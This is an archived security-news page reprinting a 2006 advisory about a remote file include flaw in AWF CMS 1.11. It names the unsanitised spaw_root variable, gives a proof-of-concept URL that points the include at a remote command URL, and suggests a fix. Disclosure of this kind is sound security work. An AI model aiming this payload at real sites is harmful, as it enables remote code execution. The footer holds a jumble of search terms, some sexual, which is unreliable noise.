about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive

exploits , vulnerabilities , articles , AWF CMS 1.11 (spaw_root) Remote File Include Vulnerability




2006-06-11 AWF CMS 1.11 (spaw_root) Remote File Include Vulnerability 
Rated as : High Risk

-----------------------------------------------------
Advisory id: FSA:011

Author:    Federico Fazzi
Date:      11/06/2006, 22:30
Sinthesis: AWF CMS 1.11, Remote command execution
Type:      high
Product:   http://www.awf-cms.org/
Patch:     unavailable
-----------------------------------------------------


1) Description:

Error occured in spaw_control.class.php,

include $spaw_root.'config/spaw_control.config.php';
include $spaw_root.'class/toolbars.class.php';
include $spaw_root.'class/lang.class.php';

variable $spaw_root not sanitized.

2) Proof of concept:

http://example/[ac_path]/spaw/spaw_control.class.php?spaw_root=[cmd_url]/
(note: add a cmd url with final slash (/))

3) Solution:

declare $spaw_root.
securitydot.net - 2006-06-11

Advertising

Copyright 2007, SecurityDot
Sat, 19 Dec 2009 09:11:14 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
search/exp mailman news for c Cr/r/n0000 saxygirls Hardcore v news for c maxcpm.inf www.887899 Trish bath www.shangx club.banda news for c components Vsftpd trace xss maxcpm.inf isnooker 1 news for c free women etero Sexteenvid Sex pictur components sex vedeoe HoaX Tool Www.Gadis components Crack Data W.w.w.big indian.pus bkhger sex /search/ex Invision P maxcpm.inf IceWarp We Tamil free sex f all cartoo sex images mod_zoom www.shenzh 200 /compo saxi image Freexxxmov www.mtc58. www.momsfu t813t sexy movie mambo Remo